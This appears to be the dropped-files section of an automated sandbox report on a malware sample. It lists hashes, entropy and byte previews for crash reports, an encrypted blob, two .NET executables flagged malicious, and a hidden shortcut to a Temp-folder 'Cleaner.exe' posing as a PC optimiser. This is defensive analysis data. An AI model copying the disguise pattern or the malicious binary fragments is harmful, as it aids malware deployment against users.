                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.472315233340739
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsKJgtWI9UqrWgc8sqYjwE8fm8M4JbUZFF+q86mYrZMjT4d:uITfYvqagrsqYkpJwp6YrZMX4d
                                                          MD5:0C58F25AFE3E1C6894F5454946ABAFCF
                                                          SHA1:3607B0A3CA164407C98B45AF5E1AA5E0FBD4BB61
                                                          SHA-256:CEE6E175E5E0A59020B9611870BF8629F3FBB88BDBB0540CBF8CA5390A5D74EE
                                                          SHA-512:9DC86B9CC95BED9456833EA42CBF16A72724FDC9B780F2D5D195DE557B420F3205313DDDD50837A90AF64F47FA5D9D1FB3F677326F238D217A6936690C1FB6A1
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:26 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):97856
                                                          Entropy (8bit):2.135212349737603
                                                          Encrypted:false
                                                          SSDEEP:384:btZPVR2GkdzhI8Avi7qcTYARJ3qNLkH2CGrdvgUJQjfioV2j4viLq:fPwFWl0YqGoHMXR9
                                                          MD5:F5205326F694B498FC62B08FEC394882
                                                          SHA1:DC722921CD4B6D5960E6B0446F498EDB94D26A39
                                                          SHA-256:D28147703B196C3E3DBA5826B6AA9A3F959CA0CBBD3A8C814C024F55495FA779
                                                          SHA-512:D8675B51D70A6C8C5390FD2C9FD4A9653A4464BB6AD18699416044B6A49F0041524FA6B46F3C29DE36795FF584B68D3CE79E60CCD4433672056F45CD9F6AA3B8
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c.........................................@..........T.......8...........T............)..PT...........................................................................................U...........B......,.......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8330
                                                          Entropy (8bit):3.7018830574626027
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6CS6Iefo6Yq8SU+JpLgmfB0SeBCpBZ89b4Esf0tTLm:RrlsNiM6Iefo6YRSU+JpLgmfOSS43fh
                                                          MD5:A2F64871DA310EFC9B560E47AC78466D
                                                          SHA1:961A61B4B336E735EA1F16088133CA2D58A55053
                                                          SHA-256:8BECC6B77CE55C064B93203872019CEEC94E8568FB6831802680F8A27EE53F06
                                                          SHA-512:55F701F5F9EBF3C6D431603C769CAFA36DA05DEA6E24B31C25896D0DA6BBF8DA7924609BDC08EAC29D0D0D1AE02B5CE302199D48ED4496C800C5CEC558867134
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.469802535886116
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsKJgtWI9UqrWgc8sqYjM8fm8M4JbUZFNd2+q86mYrZMjT4d:uITfYvqagrsqYtJwZd26YrZMX4d
                                                          MD5:22E54DA3E1222B8F05D7009D64FAA29A
                                                          SHA1:B471AE3CFB3724AE7222AB764CB01CE09938E43A
                                                          SHA-256:638AE081A3666B3C9A9C790923EBF7D469150C89ED8DF16E2B2D673F514B554A
                                                          SHA-512:CB73C749520C534931C5E74CAF5F9FD23FBB74E63B5939B89958CB30BAAC7E694B348D0A7EF746B2B78F0487B188F6CC67703CFA014DD7AB7C78B04EA65B1934
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:30 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):101612
                                                          Entropy (8bit):2.0233554653354178
                                                          Encrypted:false
                                                          SSDEEP:384:nrg49BuPBUpmIZhgRv0QqrTYAadT3qNLkH2uGuXUPAfsS1M1jOr1:nr+PR+hg8YFLGoHAUpCFK
                                                          MD5:637A1509F346A73DDC6B9274F54186F5
                                                          SHA1:A55677D9B0B38C35B7A8104E83E2E7BA9131B587
                                                          SHA-256:F014098F9A771AC3A146F2F697CDD8EFFC513E7A859A930C0498E7DC3C7D84D7
                                                          SHA-512:2E8084412855715AAAE8E39C7C44055EA233CCEBCE6F7B0B7C8728FE451E462C44A8C6E21F964C917919666E82A4F90F8B01C1C739FFC08374F613C5E0005934
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c.........................................D..........T.......8...........T...........p,..|`...........................................................................................U...........B......4.......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8330
                                                          Entropy (8bit):3.7009772854739538
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6C/6Iy06Yq7SUb2tgmfB0SeBCpBO89b/EsfhEj1m:RrlsNiR6Iy06YGSUbsgmfOSD/3fhEc
                                                          MD5:B19342F466CD0A06590350CE2C402942
                                                          SHA1:4B52815A2404C3D64F47FA96E525BC94187BD0DE
                                                          SHA-256:FE0154F99C4803C6963499E8D7798F1ADB38D842773C5B311309948F08230EB5
                                                          SHA-512:65B814936D05EB55303DE2D23BCB4F74E4BD52FE41825D02D8DB4DFD64946DA88B0DF7B3BDFA38F457B53E9A9327D83F5DE64D4876765E4DAFC5539C7B13B3B1
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.470338504952974
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsKJgtWI9UqrWgc8sqYjwb8fm8M4JbUZFyC+q86mYrZMjT4d:uITfYvqagrsqYDJw2C6YrZMX4d
                                                          MD5:D4186F0DA540E4F1DAA3CCFF8C5D5B46
                                                          SHA1:A7C04F491BA20FAF33A6E23398EDA9DFD5BDA506
                                                          SHA-256:16F0EAF110D56AAF68763B913568BF74AC29A584263FB881C9816384E97C5AF0
                                                          SHA-512:773B09F9E602ADA91FA28BAB035E9AEB95CBA8B1AA1C9949EC6BC4A9CD43DD597C0685DF344CE46DA088CE215A72309DCD88F78122D2FDDBDC68D9092C96D509
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3947920
                                                          Entropy (8bit):7.275018147968825
                                                          Encrypted:false
                                                          SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                          MD5:04514BD4962F7D60679434E0EBE49184
                                                          SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                          SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                          SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):242176
                                                          Entropy (8bit):6.47050397947197
                                                          Encrypted:false
                                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Metadefender, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):17
                                                          Entropy (8bit):3.1751231351134614
                                                          Encrypted:false
                                                          SSDEEP:3:nCmxEl:Cmc
                                                          MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                                                          SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                                                          SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                                                          SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                                                          Malicious:false
                                                          Preview:UwUoooIIrwgh24uuU
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):94224
                                                          Entropy (8bit):7.998072640845361
                                                          Encrypted:true
                                                          SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                                                          MD5:418619EA97671304AF80EC60F5A50B62
                                                          SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                                                          SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                                                          SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                                                          Malicious:false
                                                          Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):242176
                                                          Entropy (8bit):6.47050397947197
                                                          Encrypted:false
                                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3947920
                                                          Entropy (8bit):7.275018147968825
                                                          Encrypted:false
                                                          SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                          MD5:04514BD4962F7D60679434E0EBE49184
                                                          SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                          SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                          SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Oct 3 23:32:49 2022, mtime=Mon Oct 3 23:32:49 2022, atime=Mon Oct 3 23:32:49 2022, length=3947920, window=hide
                                                          Category:dropped
                                                          Size (bytes):2162
                                                          Entropy (8bit):3.868484769040416
                                                          Encrypted:false
                                                          SSDEEP:24:8G1g7vmubh5RfgKQylHALa9Y4fL4SO4Zcq4zPgFs7aB6m:8Qg7v1b7R96LQYSLFZcqlXB6
                                                          MD5:483C98CF1CB11B75492EC1E87EAD579E
                                                          SHA1:C340FA4A80E8E68646FB4639E5BBC9BADC0790FA
                                                          SHA-256:4EFADB182AC6A3E740F46E4E19E8C59E71E48EC9E2E5588075EEC5F6977EBD5C
                                                          SHA-512:274702B71E486996B794C504614F5E4DF647175FFAFFC54DCEE0D00E05C4CBCF9E557F15B41D8B7EF1601DE24CE238791B6D6FE0BF5F8A0A0DB843D5E0EE617D
                                                          Malicious:false
                                                          Preview:L..................F.@.. .........................=<.....................2.:..DG..Yr?.D..U..k0.&...&...........-.../I.....L.S........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny.DU.......Y....................f.(.A.p.p.D.a.t.a...B.P.1......U....Local.<.......Ny.DU.......Y......................`.L.o.c.a.l.....N.1.....DU....Temp..:.......Ny.DU.......Y........................T.e.m.p.....t.1.....DU....AQULKW~1..\......DU..DU.......I........................a.Q.U.L.K.w.b.F.P.d.i.o.o.8.9.4.n.0.2.5.t.....b.2..=<.DU.. .Cleaner.exe.H......DU..DU.......L....................d.$.C.l.e.a.n.e.r...e.x.e.......r...............-.......q...........f..=.....C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe....O.p.t.i.m.i.z.e. .y.o.u.r. .P.C.7.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.Q.U.L.K.w.b.F.P.d.i.o.o.8.9.4.n.0.2.5.t.\.C.l.e.a.n.e.r...e.x.e.C.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.Q.U.L.K.w.b.F.P.d.i.o.o.8.9.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
